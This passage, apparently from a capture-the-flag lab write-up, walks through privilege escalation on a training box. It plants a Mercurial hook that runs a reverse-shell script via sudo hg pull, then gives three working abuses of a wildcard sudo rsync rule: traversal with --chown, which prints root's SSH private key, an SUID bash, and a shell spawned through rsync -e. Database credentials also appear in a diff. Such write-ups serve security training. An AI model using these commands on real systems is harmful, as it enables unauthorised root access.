date:        Tue May 28 10:32:50 2024 -0400
summary:     patched SQL injection vuln

changeset:   6:f87bdc6c94a8
user:        qa
date:        Tue May 28 10:27:32 2024 -0400
summary:     patched signature vuln

changeset:   5:6c59496d5251
user:        dev
date:        Tue May 28 10:25:11 2024 -0400
summary:     updated db creds

changeset:   4:f228abd7a139
user:        dev
date:        Tue May 28 10:24:32 2024 -0400
summary:     randomized secret key

changeset:   3:9046153e7a23
user:        dev
date:        Tue May 28 10:16:16 2024 -0400
summary:     added admin order option

changeset:   2:f2533b9083da
user:        dev
date:        Tue May 28 10:15:42 2024 -0400
summary:     added admin capabilities

changeset:   1:be935002334f
user:        dev
date:        Tue May 28 10:14:02 2024 -0400
summary:     added admin template

changeset:   0:f54c91c7fae8
user:        dev
date:        Tue May 28 10:13:43 2024 -0400
summary:     initial commit
```

```diff
hg diff -c 9:f3787cac6111

diff -r 0bbf8464d2d2 -r f3787cac6111 app.py
--- a/app.py	Tue May 28 10:34:38 2024 -0400
+++ b/app.py	Tue May 28 10:37:16 2024 -0400
@@ -19,8 +19,8 @@
 db_config = {
     'host': '127.0.0.1',
-    'user': 'qa',
-    'password': 'jPAd!XQCtn8Oc@2B',
+    'user': 'chef',
+    'password': '3wDo7gSRZIwIHRxZ!',
     'database': 'yummy_db',
     'cursorclass': pymysql.cursors.DictCursor,
     'client_flag': CLIENT.MULTI_STATEMENTS
@@ -135,7 +135,7 @@
     temp_dir = tempfile.mkdtemp()
     current_date_time = datetime.now()
     formatted_date_time = current_date_time.strftime("%Y%m%d_%H%M%S")
-
+    
     cal = Calendar()
     event = Event()
@@ -145,7 +145,13 @@
     cal.events.add(event)
-    temp_file_path = os.path.join(temp_dir, quote('Yummy reservation_' + formatted_date_time + '.ics'))
+    # Sanitize and validate the file name
+    safe_filename = quote(f'Yummy_reservation_{formatted_date_time}.ics')
+    temp_file_path = os.path.join(temp_dir, safe_filename)
+
+    # Ensure the path is within the temp_dir
+    if not temp_file_path.startswith(temp_dir):
+        raise ValueError("Invalid file path")
     with open(temp_file_path, 'w') as fp:
         fp.write(cal.serialize())
```

Shell as dev

The user qa can run /usr/bin/hg pull /home/dev/app-production/ as the user dev, which pulls changes from the repository in dev’s home directory. Mercurial also supports hooks, which are commands that run after certain actions [3].

```
sudo -l

[sudo] password for qa:
Matching Defaults entries for qa on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User qa may run the following commands on localhost:
    (dev : dev) /usr/bin/hg pull /home/dev/app-production/
```

I start by creating a new folder at /dev/shm/project containing another folder called .hg. Then I place a hook into .hg/hgrc [4] that gets executed whenever changes come in. Finally, I set the permissions of both folders to 777 so that dev can access them as well.

```bash
mkdir --parents /dev/shm/project/.hg
echo -e "[hooks]\nincoming = /dev/shm/shell.sh" > /dev/shm/project/.hg/hgrc
chmod 777 /dev/shm/{project,project/.hg}
```

What’s left to do is to place a reverse shell into /dev/shm/shell.sh, make it executable, and run the pull command from within the project folder.

```bash
cd /dev/shm/project
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
```

Right in the middle of the execution, a callback arrives on the listener as dev.

Shell as root

Checking the sudo privileges of the dev user shows that I can run an rsync command as root.

```
sudo -l

Matching Defaults entries for dev on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dev may run the following commands on localhost:
    (root : root) NOPASSWD: /usr/bin/rsync -a --exclude\=.hg /home/dev/app-production/* /opt/app/
```

This command opens multiple ways to escalate privileges, because the wildcard (*) in the sudoers rule matches any string, including spaces and slashes. I can therefore add arbitrary parameters and even use path traversal to copy the root directory, as long as the command line still ends with /opt/app/.
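Python's fnmatch can approximate how the argument pattern matches the command lines used below. This is only an approximation: sudo uses its own fnmatch-style matcher on the space-joined arguments. The \= in the sudoers entry is an escaped literal =.

```python
from fnmatch import fnmatchcase

# Argument part of the sudoers rule
RULE = "-a --exclude=.hg /home/dev/app-production/* /opt/app/"

attempts = {
    "method 1": "-a --exclude=.hg /home/dev/app-production/../../../root/ --chown dev:dev /tmp/backup --log-file /opt/app/",
    "method 2": "-a --exclude=.hg /home/dev/app-production/ --chown root:root /opt/app/",
    "wrong ending": "-a --exclude=.hg /home/dev/app-production/ /tmp/elsewhere/",
}

for label, args in attempts.items():
    # '*' swallows spaces, '/' and '..', so only the fixed prefix and suffix matter
    print(label, fnmatchcase(args, RULE))
```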

Method 1

rsync has a command-line parameter that changes the ownership of the target files: --chown dev:dev. I’ll modify the command to sync the /root folder into /tmp/backup. The command line still has to end with /opt/app/, so I pass that path to a harmless parameter: --log-file.

```
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/../../../root/ --chown dev:dev /tmp/backup --log-file /opt/app/

rsync: [client] failed to open log-file /opt/app/: Is a directory (21)
Ignoring "log file" setting.

cat /tmp/backup/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACD8t/wsFHnXuKZw6GVUmPSPPHtqxx1N94baTt1/2esF8AAAAJBdGlFYXRpR
WAAAAAtzc2gtZWQyNTUxOQAAACD8t/wsFHnXuKZw6GVUmPSPPHtqxx1N94baTt1/2esF8A
AAAEA+trd9XqxX3ZSG9ESLlPSzIadF8ll0l4ll0+DKkhpkhvy3/CwUede4pnDoZVSY9I88
e2rHHU33htpO3X/Z6wXwAAAACnJvb3RAeXVtbXkBAgM=
-----END OPENSSH PRIVATE KEY-----
```

Within the backup folder I find root’s SSH key, which I use to get an interactive shell.

Method 2

The command from Method 1 also works in the opposite direction. Instead of using --chown to grant myself ownership of the files, I grant ownership to root. I also place a bash binary with the SUID bit set in /home/dev/app-production. Running the command copies it to /opt/app, preserving the permissions (-a) but changing the owner to root.

```bash
cp /bin/bash /home/dev/app-production/bash
chmod u+s /home/dev/app-production/bash
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/ --chown root:root /opt/app/
/opt/app/bash -p
```

Passing the -p switch to the transferred bash binary stops bash from dropping its effective UID, which gives me a root shell.

Method 3

It’s also possible to spawn an interactive shell through rsync with the -e switch [5], which sets the remote shell command. As in Method 1, the trailing /opt/app/ has to be passed to some unnecessary parameter.

```
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/ -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null --log-file /opt/app/

rsync: [client] failed to open log-file /opt/app/: Is a directory (21)
Ignoring "log file" setting.
# id
uid=0(root) gid=0(root) groups=0(root)
```

Attack Path

```mermaid
flowchart TD
    subgraph "Initial access"
        A(Download ICS files) -->|Path Traversal| B(Read local files)
        B --> C(Source Code of web application)
        C -->|Find RSA variables Signing| D(Forge cookies)
        D --> E(Access to admin dashboard)
    end
    subgraph "Execution"
        E -->|SQL Injection in search| F(Write files)
        F -->|Cronjob| G(Shell as mysql)
    end
    subgraph "Privilege Escalation"
        G -->|Overwrite scripts| H(Shell as www-data)
        H -->|Credentials in Mercurial history| I(Shell as qa)
        I -->|hook in Mercurial| J(Shell as dev)
        J -->|sudo privileges for rsync| K(Shell as root)
    end
```